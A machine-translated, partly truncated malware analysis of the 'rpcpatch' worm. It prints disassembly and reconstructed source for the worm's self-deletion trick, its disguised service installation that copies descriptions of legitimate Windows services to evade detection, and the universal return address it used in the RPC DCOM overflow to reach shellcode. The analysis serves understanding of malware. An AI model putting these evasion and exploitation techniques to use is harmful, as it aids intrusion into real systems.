Rpcpatch worm code comments

Rpcpatch worm code comments

Aside from the ethical issues caused by writing worms, we should admit that the person who writes this program is
A sophisticated windows programmer, with a good code style and well-written programs, is worth learning in many places. Li
It also uses a lot of techniques to show the author's understanding of windows. This program is still informative.

1. Check to delete its own functions.

First, let's look at how the worm deletes its own functions. Windows applications cannot directly Delete themselves because
During the sequential operation, the system uses the memory-mapped Files mechanism to cache the part of the space occupied by the file.
The simplest way to delete a file is to create a batch file, delete the main file from the batch file, and then
Delete the batch file itself, or directly call "CMD/C del" in the program.
Mechanism (for details, see the description of Jeffrey Richter in the "Win32 Q & A" section in msdn January 1996. Address:
Http://www.microsoft.com/msj/archive/SF9C.aspx ).
This worm uses another clever method, which was proposed by Gary nebbett.

; Call from 004012ce
: 00402970 55 push EBP
: 00402971 8bec mov EBP, ESP
: 00402973 81ec10020000 sub ESP, 00000210
: 00402979 56 push ESI
: 0040297a 8b35a8404000 mov ESI, dword ptr [004040a8]; ESI = kernel32.getmodulefilenamea
: 00402980 8d85f4feffff Lea eax, dword ptr [EBP + fffffef4]
: 00402986 6804010000 push 00000104
: 0040298b 50 push eax
: 0040298c 6a00 push 00000000
: 0040298e ffd6 call ESI; kernel32.getmodulefilenamea
: 00402990 8d8df4feffff Lea ECx, dword ptr [EBP + fffffef4]
: 00402996 51 push ECx
: 00402997 ff1574404000 call dword ptr [00404074]; kernel32.getfileattributesa
: 0040299d a801 test Al, 01; check whether the read-only attribute is set in the file
: 0040299f 7410 je 004029b1; if not, skip to delete the file.
: 004029a1 24fe and Al, Fe; If yes, remove the read-only attribute.
: 004029a3 8d95f4feffff Lea edX, dword ptr [EBP + fffffef4]
: 004029a9 50 push eax
: 004029aa 52 push edX
: 004029ab ff1578404000 call dword ptr [00404078]; kernel32.setfileattributesa
The following is the classic code of Gary nebbett:
; JMP from 0040299f
: 004029b1 6a00 push 00000000; if the parameter is null, the system returns its own handle.
: 004029b3 ff157c404000 call dword ptr [0040407c]; kernel32.getmodulehandlea
: 004029b9 8d8df0fdffff Lea ECx, dword ptr [EBP + fffffdf0]
: 004029bf 6804010000 push 00000104
: 004029c4 51 push ECx
: 004029c5 50 push eax
: 004029c6 8945fc mov dword ptr [ebp-04], eax
: 004029c9 ffd6 call ESI; Kernel32! Getmodulefilenamea
: 004029cb 6a04 push 00000004; hard coding of the file Image 4
: 004029cd ff15e0404000 call dword ptr [004040e0]; kernel32.closehandle
: 004029d3 8d85f0fdffff Lea eax, dword ptr [EBP + fffffdf0]
: 004029d9 6a00 push 00000000
: 004029db 6a00 push 00000000
: 004029dd 50 push eax; program file name
: 004029de ff35bc404000 push dword ptr [004040bc]; Kernel32! Exitprocess
: 004029e4 ff75fc push [ebp-04]; image address, which is 00400000
: 004029e7 ff35e8404000 push dword ptr [004040e8]; Kernel32! Deletefilea
: 004029ed ff3580404000 push dword ptr [1, 00404080]; Kernel32! Unmapviewoffile
: 004029f3 C3 RET
The source code is like this:
Int main (INT argc, char * argv [])
{
Hmodule module = getmodulehandle (0 );
Char Buf [max_path];
Getmodulefilename (module, Buf, sizeof BUF );
Closehandle (handle (4 ));
_ ASM {
Lea eax, Buf
Push 0
Push 0
Push eax
Push exitprocess
Push Module
Push deletefile
Push unmapviewoffile
RET
}
Return 0;
}
First, close the image handle and hard code 4 corresponding to the program itself, and then unmapviewoffile the program's own image,
Then you can delete it.

But there are two points: 1. This code is invalid on Windows XP.
2. This Code cannot be started on the command line.
Let's take a closer look at these two points.

2. Create service functions

There is nothing special about the code for creating a service. The clever thing is that the worm copies the original service description on the system.
As your own description, this is more deceptive than your own definition, because no matter which language version the worm spreads
The system can display the descriptive information that people are familiar with in the Service Manager, which is hard to detect.

; Installtftpservice
; Call from 0040137f, 004016d0
: 004015e0 81ec08020000 sub ESP, 00000208
: 004015e6 8d842404010000 Lea eax, dword ptr [esp + 00000104]
: 004015ed 56 push ESI
: 004015ee 8b351c414000 mov ESI, dword ptr [0040411c]; msvcrt. sprintf
: 004015f4 6898744000 push 00407498
: 004015f9 684c614000 push 0040614c; DB '% S/dllcache/tftpd.exe', 0
: 004015fe 50 push eax
: 004015ff ffd6 call ESI
: 00401601 83c40c add ESP, 0000000c
: 00401604 8d4c2404 Lea ECx, dword ptr [esp + 04]
: 00401608 6898744000 push 00407498
: 0040160d 6838614000 push 00406138; DB '% S/wins/svchost.exe', 0
: 00401612 51 push ECx
: 00401613 ffd6 call ESI
: 00401615 83c40c add ESP, 0000000c
: 00401618 8d542404 Lea edX, dword ptr [esp + 04]
: 0040161c 8d842408010000 Lea eax, dword ptr [esp + 00000108]
: 00401623 6a00 push 00000000
: 00401625 52 push edX
: 00401626 50 push eax
: 00401627 ff15b00004000 call dword ptr [004040b4]; kernel32.copyfilea
: 0040162d 6830614000 push 00406130; DB 'msdtc ', 0; copy the description of MSDTC.
: 00401632 6824614000 push 00406124; DB 'svchost.exe'
: 00401637 6808614000 push 00406108; DB 'network connections sharing'
: 0040163c 686c5b4000 push 00405b6c; DB 'rpctftpd', 0
: 00401641 e89a0d0000 call 004023e0; createservice
: 00401646 83c410 add ESP, 00000010
: 00401649 5E pop ESI
: 0040164a 81c408020000 add ESP, 00000208
: 00401650 C3 RET

; Installrpcpatchservice
; Call from 004016d5
: 00401660 81ec0c020000 sub ESP, 0000020c
: 00401666 8d842404010000 Lea eax, dword ptr [esp + 00000104]
: 0040166d 6804010000 push 00000104
: 00401672 50 push eax
: 00401673 6a00 push 00000000
: 00401675 ff15a8404000 call dword ptr [004040a8]; kernel32.getmodulefilenamea
: 0040167b 6898744000 push 00407498
: 00401680 8d4c2404 Lea ECx, dword ptr [esp + 04]
: 00401684 6884614000 push 00406184; DB '% S/wins/DLLHOST. EXE', 0
: 00401689 51 push ECx
: 0040168a ff151c414000 call dword ptr [0040411c]; DB 'msvcrt. sprintf', 0
: 00401690 83c40c add ESP, 0000000c
: 00401693 8d542400 Lea edX, dword ptr [esp]
: 00401697 8d842404010000 Lea eax, dword ptr [esp + 00000104]
: 0040169e 6a00 push 00000000
: 004016a0 52 push edX
: 004016a1 50 push eax
: 004016a2 ff15b00004000 call dword ptr [004040b4]; DB 'kernel32. copyfilea', 0
: 004016a8 687c614000 push 0040617c; DB 'browser ', 0
: 004016ad 6870614000 push 00406170; DB 'dllhost. EXE ', 0
: 004016b2 6864614000 push 00406164; DB 'WINS client', 0
: 004016b7 68785b4000 push 00405b78; DB 'rpcpatch ', 0
: 004016bc e81f0d0000 call 004023e0; createservice
: 004016c1 81c41c020000 add ESP, 0000021c
: 004016c7 C3 RET

; Createservice
; Call from 00401641,004 016bc
: 004023e0 81ec10010000 sub ESP, 00000110; 00ec10010000?
: 004023e6 53 push EBX
: 004023e7 55 push EBP
: 004023e8 56 push ESI
: 004023e9 57 push EDI
: 004023ea 683f000f00 push 000f003f
: 004023ef 6a00 push 00000000
: 004023f1 6a00 push 00000000
: 004023f3 ff152c404000 call dword ptr [0040402c]; advapi32.openscmanagera
: 004023f9 8be8 mov EBP, eax
: 004023fb 85ed test EBP, EBP
: 004023fd 750b JNE 0040240a; 0040240a starts to create a service. If there are many codes, they will not be listed.
: 004023ff 5f pop EDI
: 00402400 5E pop ESI
: 00402401 5d pop EBP
: 00402402 5B pop EBX
: 00402403 81c410010000 add ESP, 00000110
: 00402409 C3 RET

3. General return address

For rpc dcom overflow, you do not need to use the address of the jmp esp function when selecting the jump address, because
EBX = ESP + 9C, EDI = ESP + F8. In this way, we only need to add the corresponding number before shellcode.
To jump to these two registers.

The author of the rpcpatch worm uses 0x0100139d as the jump address to implement communication between Windows 2000 and XP.
. This address is actually the call EBX address in svchost.exe under Windows XP.
This address is used, but it is used as a jump address of Windows XP. From the author's article, he
This address is considered to be call EBX in Windows 2000 and Windows XP, but in fact Windows 2000
The address in svchost is meaningless, but you can perform several steps to go through several thrilling jumps.
There will be a call EDI, as long as the NOP in front of shellcode is enough, it will also enter shellcode.
It's just that this opportunity coincidences are too rare. Let's take a look at this thrilling journey:

0100139d 50 push eax
0100139e 6a08 push 0x8
010013a0 e8cefeffff call svchost + 0x1273 (01001273)
; After calling to 01001273, it will call to another place, and finally call NTDLL! Rtlallocateheap, and then RET out.
010013a5 85c0 test eax, eax
010013a7 a324300001 mov [svchost + 0x3024 (01003024)], eax
010013ac 741c JZ svchost + 0x13ca (010013ca)
010013ae 8b352c300001 mov ESI, [svchost + 0x302c (0100302c)]
010013b4 8bd8 mov EBX, eax
010013b6 eb0c JMP svchost + 0x13c4 (010013c4); jump down
010013b8 8933 mov [EBX], ESI
010013ba 56 push ESI
010013bb 83c30c add EBX, 0xc
010013be ffd7 call EDI; <--- after so many steps, the shellcode
010013c0 8d744602 Lea ESI, [ESI + eax * 2 + 0x2]
010013c4 66833e00 CMP word PTR [esi], 0x0
010013c8 75ee jnz svchost + 0x13b8 (010013b8); jump to shellcode

From 0100139d to 010013be, there are a total of 150 instructions in the middle. The jump should not be due to those conditions.
You cannot skip, EDI must not be modified, and shellcode in the stack must not be modified ...... Kiss with so many conditions at the same time
Windows 2000/XP. Since Windows 2000, Microsoft
Multiple services are encapsulated in the form of dll. svchost.exeis used to start multiple services.
There is no real code in the shell, so it has never been updated to sp4,svchost.exe. On the other hand
This universal address is achieved.